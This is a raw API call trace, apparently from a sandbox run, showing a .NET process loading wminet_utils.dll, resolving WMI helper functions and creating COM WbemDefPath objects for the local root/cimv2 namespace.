	[0158.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c80bb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0158.980] CoTaskMemAlloc (cb=0x43) returned 0x1b803ab0
	[0158.980] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\\\wminet_utils.dll") returned 0x642ffff0000
	[0159.523] CoTaskMemFree (pv=0x1b803ab0) 
	[0159.525] CoTaskMemAlloc (cb=0xf) returned 0x1b810210
	[0159.525] GetProcAddress (hModule=0x642ffff0000, lpProcName="ResetSecurity") returned 0x642ffff20e0
	[0159.525] CoTaskMemFree (pv=0x1b810210) 
	[0159.656] CoTaskMemAlloc (cb=0xd) returned 0x1b810210
	[0159.656] GetProcAddress (hModule=0x642ffff0000, lpProcName="SetSecurity") returned 0x642ffff21b0
	[0159.656] CoTaskMemFree (pv=0x1b810210) 
	[0160.082] CoTaskMemAlloc (cb=0x14) returned 0x1b810210
	[0160.083] GetProcAddress (hModule=0x642ffff0000, lpProcName="BlessIWbemServices") returned 0x642ffff2290
	[0160.083] CoTaskMemFree (pv=0x1b810210) 
	[0160.857] CoTaskMemAlloc (cb=0x1a) returned 0x1b801100
	[0160.857] GetProcAddress (hModule=0x642ffff0000, lpProcName="BlessIWbemServicesObject") returned 0x642ffff23b0
	[0160.857] CoTaskMemFree (pv=0x1b801100) 
	[0161.142] CoTaskMemAlloc (cb=0x13) returned 0x1b810210
	[0161.143] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyHandle") returned 0x642ffff24d0
	[0161.143] CoTaskMemFree (pv=0x1b810210) 
	[0161.616] CoTaskMemAlloc (cb=0x14) returned 0x1b810210
	[0161.616] GetProcAddress (hModule=0x642ffff0000, lpProcName="WritePropertyValue") returned 0x642ffff2500
	[0161.616] CoTaskMemFree (pv=0x1b810210) 
	[0161.701] CoTaskMemAlloc (cb=0x7) returned 0x1b80fe50
	[0161.702] GetProcAddress (hModule=0x642ffff0000, lpProcName="Clone") returned 0x642ffff2530
	[0161.702] CoTaskMemFree (pv=0x1b80fe50) 
	[0161.725] CoTaskMemAlloc (cb=0x11) returned 0x1b810250
	[0161.726] GetProcAddress (hModule=0x642ffff0000, lpProcName="VerifyClientKey") returned 0x642ffff31f0
	[0161.726] CoTaskMemFree (pv=0x1b810250) 
	[0161.740] CoTaskMemAlloc (cb=0x11) returned 0x1b810250
	[0161.741] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetQualifierSet") returned 0x642ffff2a50
	[0161.741] CoTaskMemFree (pv=0x1b810250) 
	[0162.003] CoTaskMemAlloc (cb=0x5) returned 0x1b80fe50
	[0162.004] GetProcAddress (hModule=0x642ffff0000, lpProcName="Get") returned 0x642ffff2700
	[0162.004] CoTaskMemFree (pv=0x1b80fe50) 
	[0162.414] CoTaskMemAlloc (cb=0x5) returned 0x1b80fe50
	[0162.415] GetProcAddress (hModule=0x642ffff0000, lpProcName="Put") returned 0x642ffff26c0
	[0162.415] CoTaskMemFree (pv=0x1b80fe50) 
	[0162.613] CoTaskMemAlloc (cb=0x8) returned 0x1b80fe50
	[0162.614] GetProcAddress (hModule=0x642ffff0000, lpProcName="Delete") returned 0x642ffff2750
	[0162.614] CoTaskMemFree (pv=0x1b80fe50) 
	[0162.744] CoTaskMemAlloc (cb=0xa) returned 0x1b810250
	[0162.744] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetNames") returned 0x642ffff2760
	[0162.744] CoTaskMemFree (pv=0x1b810250) 
	[0163.022] CoTaskMemAlloc (cb=0x12) returned 0x1b810250
	[0163.022] GetProcAddress (hModule=0x642ffff0000, lpProcName="BeginEnumeration") returned 0x642ffff27b0
	[0163.022] CoTaskMemFree (pv=0x1b810250) 
	[0163.050] CoTaskMemAlloc (cb=0x6) returned 0x1b80fe50
	[0163.050] GetProcAddress (hModule=0x642ffff0000, lpProcName="Next") returned 0x642ffff27c0
	[0163.050] CoTaskMemFree (pv=0x1b80fe50) 
	[0163.331] CoTaskMemAlloc (cb=0x10) returned 0x1b810250
	[0163.332] GetProcAddress (hModule=0x642ffff0000, lpProcName="EndEnumeration") returned 0x642ffff2810
	[0163.332] CoTaskMemFree (pv=0x1b810250) 
	[0163.456] CoTaskMemAlloc (cb=0x19) returned 0x1b800e00
	[0163.457] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyQualifierSet") returned 0x642ffff2820
	[0163.457] CoTaskMemFree (pv=0x1b800e00) 
	[0163.595] CoTaskMemAlloc (cb=0x7) returned 0x1b80fe50
	[0163.596] GetProcAddress (hModule=0x642ffff0000, lpProcName="Clone") returned 0x642ffff2530
	[0163.596] CoTaskMemFree (pv=0x1b80fe50) 
	[0163.596] CoTaskMemAlloc (cb=0xf) returned 0x1b810210
	[0163.596] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetObjectText") returned 0x642ffff2840
	[0163.596] CoTaskMemFree (pv=0x1b810210) 
	[0163.742] CoTaskMemAlloc (cb=0x13) returned 0x1b810250
	[0163.743] GetProcAddress (hModule=0x642ffff0000, lpProcName="SpawnDerivedClass") returned 0x642ffff2860
	[0163.743] CoTaskMemFree (pv=0x1b810250) 
	[0163.948] CoTaskMemAlloc (cb=0xf) returned 0x1b810210
	[0163.948] GetProcAddress (hModule=0x642ffff0000, lpProcName="SpawnInstance") returned 0x642ffff2880
	[0163.948] CoTaskMemFree (pv=0x1b810210) 
	[0164.187] CoTaskMemAlloc (cb=0xb) returned 0x1b810250
	[0164.187] GetProcAddress (hModule=0x642ffff0000, lpProcName="CompareTo") returned 0x642ffff28a0
	[0164.187] CoTaskMemFree (pv=0x1b810250) 
	[0164.233] CoTaskMemAlloc (cb=0x13) returned 0x1b810250
	[0164.233] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyOrigin") returned 0x642ffff28c0
	[0164.233] CoTaskMemFree (pv=0x1b810250) 
	[0164.611] CoTaskMemAlloc (cb=0xe) returned 0x1b810250
	[0164.612] GetProcAddress (hModule=0x642ffff0000, lpProcName="InheritsFrom") returned 0x642ffff28e0
	[0164.612] CoTaskMemFree (pv=0x1b810250) 
	[0164.768] CoTaskMemAlloc (cb=0xb) returned 0x1b810250
	[0164.769] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethod") returned 0x642ffff28f0
	[0164.769] CoTaskMemFree (pv=0x1b810250) 
	[0165.028] CoTaskMemAlloc (cb=0xb) returned 0x1b810250
	[0165.029] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutMethod") returned 0x642ffff2940
	[0165.029] CoTaskMemFree (pv=0x1b810250) 
	[0165.461] CoTaskMemAlloc (cb=0xe) returned 0x1b810250
	[0165.462] GetProcAddress (hModule=0x642ffff0000, lpProcName="DeleteMethod") returned 0x642ffff2990
	[0165.462] CoTaskMemFree (pv=0x1b810250) 
	[0165.486] CoTaskMemAlloc (cb=0x18) returned 0x1b810250
	[0165.486] GetProcAddress (hModule=0x642ffff0000, lpProcName="BeginMethodEnumeration") returned 0x642ffff29a0
	[0165.486] CoTaskMemFree (pv=0x1b810250) 
	[0165.614] CoTaskMemAlloc (cb=0xc) returned 0x1b810250
	[0165.615] GetProcAddress (hModule=0x642ffff0000, lpProcName="NextMethod") returned 0x642ffff29b0
	[0165.615] CoTaskMemFree (pv=0x1b810250) 
	[0165.937] CoTaskMemAlloc (cb=0x16) returned 0x1b810250
	[0165.938] GetProcAddress (hModule=0x642ffff0000, lpProcName="EndMethodEnumeration") returned 0x642ffff2a00
	[0166.063] CoTaskMemFree (pv=0x1b810250) 
	[0166.066] CoTaskMemAlloc (cb=0x17) returned 0x1b810250
	[0166.066] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethodQualifierSet") returned 0x642ffff2a10
	[0166.066] CoTaskMemFree (pv=0x1b810250) 
	[0166.253] CoTaskMemAlloc (cb=0x11) returned 0x1b810210
	[0166.254] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethodOrigin") returned 0x642ffff2a30
	[0166.254] CoTaskMemFree (pv=0x1b810210) 
	[0166.600] CoTaskMemAlloc (cb=0x12) returned 0x1b810210
	[0166.600] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Get") returned 0x642ffff2a60
	[0166.600] CoTaskMemFree (pv=0x1b810210) 
	[0166.826] CoTaskMemAlloc (cb=0x12) returned 0x1b810210
	[0166.827] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Put") returned 0x642ffff2ab0
	[0166.827] CoTaskMemFree (pv=0x1b810210) 
	[0167.136] CoTaskMemAlloc (cb=0x15) returned 0x1b810210
	[0167.137] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Delete") returned 0x642ffff2ae0
	[0167.137] CoTaskMemFree (pv=0x1b810210) 
	[0167.375] CoTaskMemAlloc (cb=0x17) returned 0x1b810210
	[0167.375] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_GetNames") returned 0x642ffff2af0
	[0167.375] CoTaskMemFree (pv=0x1b810210) 
	[0167.416] CoTaskMemAlloc (cb=0x1f) returned 0x1b800da0
	[0167.416] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x642ffff2b10
	[0167.416] CoTaskMemFree (pv=0x1b800da0) 
	[0167.543] CoTaskMemAlloc (cb=0x13) returned 0x1b810210
	[0167.544] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Next") returned 0x642ffff2b20
	[0167.544] CoTaskMemFree (pv=0x1b810210) 
	[0167.713] CoTaskMemAlloc (cb=0x1d) returned 0x1b800f50
	[0167.714] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_EndEnumeration") returned 0x642ffff2b70
	[0167.714] CoTaskMemFree (pv=0x1b800f50) 
	[0167.716] CoTaskMemAlloc (cb=0x19) returned 0x1b800f80
	[0167.716] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetCurrentApartmentType") returned 0x642ffff2a50
	[0167.867] CoTaskMemFree (pv=0x1b800f80) 
	[0167.891] CoTaskMemAlloc (cb=0x16) returned 0x1b810210
	[0167.891] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetDemultiplexedStub") returned 0x642ffff2060
	[0167.891] CoTaskMemFree (pv=0x1b810210) 
	[0168.145] CoTaskMemAlloc (cb=0x17) returned 0x1b810210
	[0168.146] GetProcAddress (hModule=0x642ffff0000, lpProcName="CreateInstanceEnumWmi") returned 0x642ffff1760
	[0168.146] CoTaskMemFree (pv=0x1b810210) 
	[0168.648] CoTaskMemAlloc (cb=0x14) returned 0x1b810210
	[0168.648] GetProcAddress (hModule=0x642ffff0000, lpProcName="CreateClassEnumWmi") returned 0x642ffff18c0
	[0168.648] CoTaskMemFree (pv=0x1b810210) 
	[0169.136] CoTaskMemAlloc (cb=0xe) returned 0x1b810210
	[0169.136] GetProcAddress (hModule=0x642ffff0000, lpProcName="ExecQueryWmi") returned 0x642ffff1a20
	[0169.136] CoTaskMemFree (pv=0x1b810210) 
	[0169.793] CoTaskMemAlloc (cb=0x1a) returned 0x1b8011f0
	[0169.794] GetProcAddress (hModule=0x642ffff0000, lpProcName="ExecNotificationQueryWmi") returned 0x642ffff1b90
	[0169.794] CoTaskMemFree (pv=0x1b8011f0) 
	[0170.272] CoTaskMemAlloc (cb=0x10) returned 0x1b810210
	[0170.273] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutInstanceWmi") returned 0x642ffff1d00
	[0170.273] CoTaskMemFree (pv=0x1b810210) 
	[0170.754] CoTaskMemAlloc (cb=0xd) returned 0x1b810210
	[0170.754] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutClassWmi") returned 0x642ffff1e00
	[0170.754] CoTaskMemFree (pv=0x1b810210) 
	[0171.092] CoTaskMemAlloc (cb=0x1a) returned 0x1b800f20
	[0171.093] GetProcAddress (hModule=0x642ffff0000, lpProcName="CloneEnumWbemClassObject") returned 0x642ffff1f00
	[0171.093] CoTaskMemFree (pv=0x1b800f20) 
	[0171.479] CoTaskMemAlloc (cb=0x12) returned 0x1b810210
	[0171.480] GetProcAddress (hModule=0x642ffff0000, lpProcName="ConnectServerWmi") returned 0x642ffff34c0
	[0171.480] CoTaskMemFree (pv=0x1b810210) 
	[0171.977] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80d010 | out: pAptType=0x1c80d010*=1) returned 0x0
	[0171.978] IUnknown:QueryInterface (in: This=0x181868, riid=0x310f4c0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d118 | out: ppvObject=0x1c80d118*=0x0) returned 0x80004002
	[0171.978] IUnknown:Release (This=0x181868) returned 0x0
	[0172.095] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x1c80c810 | out: lpiid=0x1c80c810) returned 0x0
	[0172.096] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c680 | out: ppv=0x1c80c680*=0x1c821370) returned 0x0
	[0172.106] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821370, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c390 | out: ppvObject=0x1c80c390*=0x0) returned 0x80004002
	[0172.107] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c821370, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c378 | out: ppvObject=0x1c80c378*=0x1c821390) returned 0x0
	[0172.107] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821390, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c280 | out: ppvObject=0x1c80c280*=0x1c821390) returned 0x0
	[0172.113] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821390, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c300 | out: ppvObject=0x1c80c300*=0x0) returned 0x80004002
	[0172.124] WbemDefPath:IUnknown:AddRef (This=0x1c821390) returned 0x3
	[0172.125] CoGetContextToken (in: pToken=0x1c80bf50 | out: pToken=0x1c80bf50) returned 0x0
	[0172.125] CoGetObjectContext (in: riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1b803b68 | out: ppv=0x1b803b68*=0x181850) returned 0x0
	[0172.125] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821390, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bf10 | out: ppvObject=0x1c80bf10*=0x1b810270) returned 0x0
	[0172.126] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b810270, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bf40 | out: pCid=0x1c80bf40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.126] WbemDefPath:IUnknown:Release (This=0x1b810270) returned 0x3
	[0172.146] CoGetContextToken (in: pToken=0x1c80bf20 | out: pToken=0x1c80bf20) returned 0x0
	[0172.146] WbemDefPath:IUnknown:AddRef (This=0x1c821390) returned 0x4
	[0172.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821390, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c038 | out: ppvObject=0x1c80c038*=0x0) returned 0x80004002
	[0172.147] WbemDefPath:IUnknown:Release (This=0x1c821390) returned 0x3
	[0172.147] WbemDefPath:IUnknown:Release (This=0x1c821390) returned 0x2
	[0172.147] WbemDefPath:IUnknown:Release (This=0x1c821370) returned 0x0
	[0172.147] WbemDefPath:IUnknown:Release (This=0x1c821390) returned 0x1
	[0172.149] CoGetContextToken (in: pToken=0x1c80cc50 | out: pToken=0x1c80cc50) returned 0x0
	[0172.149] CoGetContextToken (in: pToken=0x1c80cb90 | out: pToken=0x1c80cb90) returned 0x0
	[0172.149] WbemDefPath:IUnknown:AddRef (This=0x1c821390) returned 0x2
	[0172.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821390, riid=0x1c80ccd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ccb0 | out: ppvObject=0x1c80ccb0*=0x1c821390) returned 0x0
	[0172.150] WbemDefPath:IUnknown:Release (This=0x1c821390) returned 0x2
	[0172.150] WbemDefPath:IUnknown:Release (This=0x1c821390) returned 0x1
	[0172.151] CoGetObjectContext (in: riid=0x1c80bf78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80bf70 | out: ppv=0x1c80bf70*=0x181868) returned 0x0
	[0172.151] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80bf90 | out: pAptType=0x1c80bf90*=1) returned 0x0
	[0172.151] IUnknown:QueryInterface (in: This=0x181868, riid=0x310f4c0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80c098 | out: ppvObject=0x1c80c098*=0x0) returned 0x80004002
	[0172.151] IUnknown:Release (This=0x181868) returned 0x1
	[0172.152] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80b600 | out: ppv=0x1c80b600*=0x1c821370) returned 0x0
	[0172.152] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821370, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80b310 | out: ppvObject=0x1c80b310*=0x0) returned 0x80004002
	[0172.152] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c821370, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80b2f8 | out: ppvObject=0x1c80b2f8*=0x1c821490) returned 0x0
	[0172.153] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821490, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80b200 | out: ppvObject=0x1c80b200*=0x1c821490) returned 0x0
	[0172.153] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821490, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80b280 | out: ppvObject=0x1c80b280*=0x0) returned 0x80004002
	[0172.153] WbemDefPath:IUnknown:AddRef (This=0x1c821490) returned 0x3
	[0172.153] CoGetContextToken (in: pToken=0x1c80aed0 | out: pToken=0x1c80aed0) returned 0x0
	[0172.153] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821490, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ae90 | out: ppvObject=0x1c80ae90*=0x1b8102b0) returned 0x0
	[0172.153] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b8102b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80aec0 | out: pCid=0x1c80aec0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.154] WbemDefPath:IUnknown:Release (This=0x1b8102b0) returned 0x3
	[0172.154] CoGetContextToken (in: pToken=0x1c80aea0 | out: pToken=0x1c80aea0) returned 0x0
	[0172.154] WbemDefPath:IUnknown:AddRef (This=0x1c821490) returned 0x4
	[0172.154] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821490, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80afb8 | out: ppvObject=0x1c80afb8*=0x0) returned 0x80004002
	[0172.154] WbemDefPath:IUnknown:Release (This=0x1c821490) returned 0x3
	[0172.154] WbemDefPath:IUnknown:Release (This=0x1c821490) returned 0x2
	[0172.154] WbemDefPath:IUnknown:Release (This=0x1c821370) returned 0x0
	[0172.155] WbemDefPath:IUnknown:Release (This=0x1c821490) returned 0x1
	[0172.155] CoGetContextToken (in: pToken=0x1c80bbd0 | out: pToken=0x1c80bbd0) returned 0x0
	[0172.155] CoGetContextToken (in: pToken=0x1c80bb10 | out: pToken=0x1c80bb10) returned 0x0
	[0172.155] WbemDefPath:IUnknown:AddRef (This=0x1c821490) returned 0x2
	[0172.155] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821490, riid=0x1c80bc50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80bc30 | out: ppvObject=0x1c80bc30*=0x1c821490) returned 0x0
	[0172.155] WbemDefPath:IUnknown:Release (This=0x1c821490) returned 0x2
	[0172.155] WbemDefPath:IUnknown:Release (This=0x1c821490) returned 0x1
	[0172.234] CoGetContextToken (in: pToken=0x1c80bd50 | out: pToken=0x1c80bd50) returned 0x0
	[0172.234] CoGetContextToken (in: pToken=0x1c80bc90 | out: pToken=0x1c80bc90) returned 0x0
	[0172.234] WbemDefPath:IUnknown:AddRef (This=0x1c821490) returned 0x2
	[0172.234] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821490, riid=0x1c80bdd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80bdb0 | out: ppvObject=0x1c80bdb0*=0x1c821490) returned 0x0
	[0172.234] WbemDefPath:IUnknown:Release (This=0x1c821490) returned 0x2
	[0172.235] WbemDefPath:IUnknown:AddRef (This=0x1c821490) returned 0x3
	[0172.235] WbemDefPath:IWbemPath:SetText (This=0x1c821490, uMode=0x4, pszPath="//./root/cimv2") returned 0x0
	[0172.235] WbemDefPath:IUnknown:Release (This=0x1c821490) returned 0x2
	[0172.236] CoGetContextToken (in: pToken=0x1c80cdd0 | out: pToken=0x1c80cdd0) returned 0x0
	[0172.236] CoGetContextToken (in: pToken=0x1c80cd10 | out: pToken=0x1c80cd10) returned 0x0
	[0172.236] WbemDefPath:IUnknown:AddRef (This=0x1c821390) returned 0x2
	[0172.236] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c821390, riid=0x1c80ce50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ce30 | out: ppvObject=0x1c80ce30*=0x1c821390) returned 0x0
	[0172.236] WbemDefPath:IUnknown:Release (This=0x1c821390) returned 0x2
	[0172.236] WbemDefPath:IUnknown:AddRef (This=0x1c821390) returned 0x3
	[0172.236] WbemDefPath:IWbemPath:SetText (This=0x1c821390, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.237] WbemDefPath:IUnknown:Release (This=0x1c821390) returned 0x2
	[0172.238] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c821390, puCount=0x1c80d0e0 | out: puCount=0x1c80d0e0*=0x2) returned 0x0
	[0172.239] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d0e0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d0e0*=0x17, pszText=0x0) returned 0x0
	[0172.240] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d0e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d0e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.244] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c821390, puCount=0x1c80d090 | out: puCount=0x1c80d090*=0x2) returned 0x0
	[0172.244] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d090*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d090*=0x17, pszText=0x0) returned 0x0
	[0172.244] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d090*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d090*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.293] CoGetObjectContext (in: riid=0x1c80cfc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfc0 | out: ppv=0x1c80cfc0*=0x181868) returned 0x0
	[0172.294] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfe0 | out: pAptType=0x1c80cfe0*=1) returned 0x0
	[0172.294] IUnknown:QueryInterface (in: This=0x181868, riid=0x310f4c0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0e8 | out: ppvObject=0x1c80d0e8*=0x0) returned 0x80004002
	[0172.294] IUnknown:Release (This=0x181868) returned 0x1
	[0172.294] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x1c80ce00 | out: lpiid=0x1c80ce00) returned 0x0
